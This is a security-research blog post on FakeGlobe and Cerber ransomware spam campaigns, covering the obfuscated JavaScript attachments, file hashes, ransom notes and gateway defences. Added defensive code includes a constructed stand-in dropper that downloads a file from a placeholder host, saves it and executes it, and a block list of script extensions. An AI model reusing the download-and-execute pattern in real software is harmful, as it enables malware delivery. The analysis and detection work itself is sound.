SpiderLabs Blog

FakeGlobe and Cerber Ransomware: Sneaking under the radar while WeCry

Recently, we observed a constant influx of spam distributing two ransomware families, perhaps trying to sneak in while everyone is focused on the recent WannaCry malware. Based on data from our Spam Research Database, an email campaign distributing FakeGlobe ransomware started on May 19th and died down on May 21st. Just a couple of hours later it was Cerber's turn, and that campaign subsided three days later.


Figure 1: Volume of FakeGlobe and Cerber related Spam.

The Cerber family began to emerge in the first quarter of 2016 and has been distributed via the Neutrino and Magnitude exploit kits and via spam emails carrying VBScript files. FakeGlobe samples, on the other hand, were first seen in the last quarter of 2016 via malicious spam and are considered closely related to the Globe ransomware family.

This is not a massive campaign, but we did count almost 31,000 spam emails in our system across both malware families. While we don't know which botnet sent these emails, the majority originate from Vietnam, India and Laos; this merely indicates where the compromised sending machines are located.


Figure 2: FakeGlobe and Cerber Spam Origin.

Infection Vector

The spam related to FakeGlobe and Cerber arrives with a ZIP attachment, a blank Subject line and no message body.


Figure 3: Sample Email

For FakeGlobe, the ZIP extracts to an obfuscated JS file, and there are two variations. As shown in the figure below, the first variation is encoded with the Microsoft Script Encoder, which wraps the script in the distinctive delimiters #@~^ and ^#~@. Publicly available tools can decode this encoding.


Figure 4: MS Encoded Script – FakeGlobe

The second variation relies on eval(), with the string it evaluates being rebuilt at runtime by split() and join().


Figure 5: Obfuscated Script – FakeGlobe

A classic way to de-obfuscate this is to replace the eval() call with document.write, so the string that would have been evaluated is written into the document instead of executed. Do this in an isolated analysis VM, since anything else in the script still runs.


Figure 6: Handling the Obfuscated Script – FakeGlobe

Decoding either script yields plain JS that downloads a binary, saves it under a filename made of a random string of digits and executes it.


Figure 7: Decoded/De-obfuscated Script for FakeGlobe
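The document.write swap above can be done without a browser by running the loader with eval shadowed by a function that records its argument. The block below is an added example, not code from the Trustwave post or from either malware family; the same harness applies to the Cerber script, which uses the same eval()-driven obfuscation. STAGE2 is a constructed, harmless stand-in for the decoded dropper (the URL uses the reserved .invalid TLD, and the ActiveX calls would throw in Node, which is exactly why the harness must recover it without running it). The delimiter, the URL, the ActiveX object names and the helper names are all assumptions for the demonstration.

```javascript
// Added example (not the post's or the malware's code). Recovers the stage hidden
// behind eval() + split()/join() by capturing instead of evaluating.

// Constructed stand-in for the decoded dropper stage. Not the real sample.
const STAGE2 = [
  '// constructed stand-in for the decoded dropper stage (not the real sample)',
  'var url = "http://example.invalid/get.php?id=1";',           // hypothetical URL
  'var name = "" + Math.floor(Math.random() * 1e9) + ".exe";', // random-digit filename, as in the post
  'var xhr = new ActiveXObject("MSXML2.XMLHTTP");',
  'xhr.open("GET", url, false); xhr.send();',
  'var stream = new ActiveXObject("ADODB.Stream");',
  'stream.Open(); stream.Type = 1; stream.Write(xhr.responseBody);',
  'stream.SaveToFile(name, 2);',
  'new ActiveXObject("WScript.Shell").Run(name);',
].join('\n');

// Reproduce the loader's trick: every character of the payload is separated by
// a junk delimiter, split()/join() reassemble it at runtime, and eval() runs it.
function obfuscate(code, delim) {
  const spread = code.split('').join(delim);
  return 'var s = ' + JSON.stringify(spread) +
         '.split(' + JSON.stringify(delim) + ').join("");\n' +
         'eval(s);';
}
const OBFUSCATED_LOADER = obfuscate(STAGE2, '~@~'); // delimiter is an assumption

// Microsoft Script Encoder output (the post's first variation) is wrapped in
// #@~^ ... ^#~@ and needs a dedicated decoder; this only recognises it.
function isMsScriptEncoded(text) {
  return text.includes('#@~^') && text.includes('^#~@');
}

// Unwrap one eval() layer without executing what it hides: the loader runs
// with `eval` (and document.write) shadowed by functions that just record
// their argument. This is the post's document.write swap, done in Node.
function unwrapEval(script) {
  const captured = [];
  const record = (code) => { captured.push(String(code)); };
  const run = new Function('eval', 'document', 'window', script);
  run(record, { write: record }, {});
  return captured;
}

// Peel wrapper layers until the recovered stage contains no eval() call.
// Only wrapper layers are ever run; the final stage is returned as text.
// Real droppers may put download code beside the eval(), so do this in a
// disposable VM, never on an analyst workstation.
function deobfuscate(script, maxLayers = 5) {
  let current = script;
  for (let i = 0; i < maxLayers; i++) {
    if (!/\beval\s*\(/.test(current)) return current;
    const stages = unwrapEval(current);
    if (stages.length === 0) return current;
    current = stages.join('\n');
  }
  throw new Error('more than ' + maxLayers + ' eval() layers; inspect by hand');
}

// Pull the indicators an analyst wants from the decoded stage.
function extractIndicators(stage) {
  return {
    urls: stage.match(/https?:\/\/[^\s"'<>]+/g) || [],
    activeX: [...stage.matchAll(/ActiveXObject\(\s*["']([^"']+)["']\s*\)/g)].map((m) => m[1]),
  };
}

function analyze(loader) {
  const decoded = deobfuscate(loader);
  return { decoded, indicators: extractIndicators(decoded) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const result = analyze(OBFUSCATED_LOADER);
  console.log(result.decoded);
  console.log(result.indicators);
}
```

The recovered text is never passed to a real eval, so the download/execute stage is only ever read, and the URL and ActiveX objects it references fall out as indicators.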

Download URLs (FakeGlobe):




Hash Details (FakeGlobe):

MD5: 1BBD2DC9746292C60121865663B287F2

SHA-1: 04644335EF7523274146A4F39AB30621C2A2A9A1

SHA-256: 2815C8CDB02003298F7959FD1CF6EED893DE6652F3861A6A2E3E5744B8AC9234

For the Cerber variants, the ZIP likewise contains a single obfuscated JS file; decoding it reveals a downloader for a different binary.


Figure 8: De-obfuscated Script for Cerber

Download URLs (Cerber):


Hash Details (Cerber):

MD5: AE5A348B9DD0AC3A6A46E70C82FA9C38

SHA-1: F440EDC4FE35452D0FBEC35A5C352295F3E3BF0C

SHA-256: 73A7497C8FA283B444242259AE061D5CBB705BE04B5F531F1096A2C236BB5204

Executable Payload

The binaries of both FakeGlobe and Cerber behave the same as their previous variants, encrypting files, with only minor changes to the ransom note. Cerber now uses a different filename for its ransom note, _R_E_A_D___T_H_I_S___{random}.html or _R_E_A_D___T_H_I_S___{random}.txt, and keeps the old note contents except for the payment URL details.


Figure 9: Cerber's Ransom Note

FakeGlobe still drops how_to_back_files.html, but has changed the email address to which victims are told to send a screenshot of their bitcoin payment.



While everyone is riding the WeCry/WannaCry wave and focused on patching the SMB vulnerabilities, FakeGlobe and Cerber continue a low-profile attack via email. Each of these emails carries a unique attachment because the obfuscated JavaScript differs from copy to copy, so hash-based blocking of the attachment is of little use. By the time the script downloads the main ransomware, it is too late, so it is best to block this at the email gateway.

  • Use an email gateway with multiple layers of protection, including anti-spam and anti-malware layers with up-to-date signatures
  • At a policy level, consider blocking inbound *.js files at the email gateway; we are currently seeing many malicious email campaigns that use *.js files. Note that in this campaign the .js arrives inside a ZIP, so the policy must look at archive contents, not just the attachment's own extension
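The caveat in the second recommendation is worth making concrete: an extension rule that only inspects the attachment name passes a ZIP, and the .js inside it is what runs. The block below is an added example, not Trustwave's gateway code, showing the check a practitioner would want: it walks the ZIP central directory (no member is ever decompressed) and blocks the message if any member has a scripting extension, also catching archives that were renamed to dodge a .zip rule by looking at the local-file-header magic. The blocked extension list, the sample member names and the helper names are assumptions; the ZIP used as input is constructed in memory so the check runs offline.

```javascript
'use strict';
// Added example (not Trustwave's code): attachment policy check that looks
// inside ZIP attachments for script files. Parses only the central directory.

const BLOCKED_EXTENSIONS = new Set(['js', 'jse', 'vbs', 'vbe', 'wsf', 'wsh', 'hta']); // assumption

// Reverse-scan for the end-of-central-directory record (signature 50 4B 05 06).
function findEocd(buf) {
  for (let i = buf.length - 22; i >= 0; i--) {
    if (buf.readUInt32LE(i) === 0x06054b50) return i;
  }
  throw new Error('not a ZIP archive: no end-of-central-directory record');
}

// Return member file names from the central directory (names only, no data).
function listZipMembers(buf) {
  const eocd = findEocd(buf);
  const entries = buf.readUInt16LE(eocd + 10);   // total entries
  let pos = buf.readUInt32LE(eocd + 16);         // central directory offset
  const names = [];
  for (let n = 0; n < entries; n++) {
    if (buf.readUInt32LE(pos) !== 0x02014b50) throw new Error('corrupt central directory');
    const nameLen = buf.readUInt16LE(pos + 28);
    const extraLen = buf.readUInt16LE(pos + 30);
    const commentLen = buf.readUInt16LE(pos + 32);
    names.push(buf.toString('utf8', pos + 46, pos + 46 + nameLen));
    pos += 46 + nameLen + extraLen + commentLen;
  }
  return names;
}

// Last extension of the base name, lower-cased ("invoice.pdf.js" -> "js").
function extensionOf(name) {
  const base = name.split('/').pop();
  const dot = base.lastIndexOf('.');
  return dot === -1 ? '' : base.slice(dot + 1).toLowerCase();
}

// Policy decision for one attachment: { action: 'block' | 'allow', reason }.
function checkAttachment(filename, data) {
  const ext = extensionOf(filename);
  if (BLOCKED_EXTENSIONS.has(ext)) return { action: 'block', reason: 'bare script attachment ' + filename };
  const looksLikeZip = data.length >= 4 && data.readUInt32LE(0) === 0x04034b50; // local file header magic
  if (ext === 'zip' || looksLikeZip) {
    const hit = listZipMembers(data).find((m) => BLOCKED_EXTENSIONS.has(extensionOf(m)));
    if (hit) return { action: 'block', reason: 'script ' + hit + ' inside archive ' + filename };
  }
  return { action: 'allow', reason: 'no script attachment' };
}

// --- Constructed sample input: a minimal "stored" (uncompressed) ZIP built in
// memory so the check runs offline. Not a real sample from the campaign.
function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) {
    c ^= b;
    for (let k = 0; k < 8; k++) c = (c >>> 1) ^ (0xedb88320 & -(c & 1));
  }
  return (c ^ 0xffffffff) >>> 0;
}

function buildStoredZip(files) {
  const locals = [], centrals = [];
  let offset = 0;
  for (const [name, content] of files) {
    const nameBuf = Buffer.from(name, 'utf8');
    const data = Buffer.from(content, 'utf8');
    const crc = crc32(data);
    const local = Buffer.alloc(30);                 // local file header
    local.writeUInt32LE(0x04034b50, 0); local.writeUInt16LE(20, 4);
    local.writeUInt32LE(crc, 14); local.writeUInt32LE(data.length, 18); local.writeUInt32LE(data.length, 22);
    local.writeUInt16LE(nameBuf.length, 26);
    const central = Buffer.alloc(46);               // central directory entry
    central.writeUInt32LE(0x02014b50, 0); central.writeUInt16LE(20, 4); central.writeUInt16LE(20, 6);
    central.writeUInt32LE(crc, 16); central.writeUInt32LE(data.length, 20); central.writeUInt32LE(data.length, 24);
    central.writeUInt16LE(nameBuf.length, 28); central.writeUInt32LE(offset, 42);
    locals.push(local, nameBuf, data);
    centrals.push(central, nameBuf);
    offset += 30 + nameBuf.length + data.length;
  }
  const cd = Buffer.concat(centrals);
  const eocd = Buffer.alloc(22);                    // end of central directory
  eocd.writeUInt32LE(0x06054b50, 0);
  eocd.writeUInt16LE(files.length, 8); eocd.writeUInt16LE(files.length, 10);
  eocd.writeUInt32LE(cd.length, 12); eocd.writeUInt32LE(offset, 16);
  return Buffer.concat([...locals, cd, eocd]);
}

// Constructed attachments: one mimics the campaign (ZIP holding a .js), one is benign.
const SAMPLE_ATTACHMENT = buildStoredZip([['invoice_83921.js', 'eval("x".split("|").join(""));']]);
const SAMPLE_BENIGN = buildStoredZip([['report.pdf', '%PDF-1.4 constructed placeholder']]);
```

Hooked into a gateway, checkAttachment runs once per MIME part; blocking on the member name keeps the rule independent of the per-message obfuscation that makes every attachment hash unique.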

The Trustwave Secure Email Gateway recognizes and blocks this threat campaign.
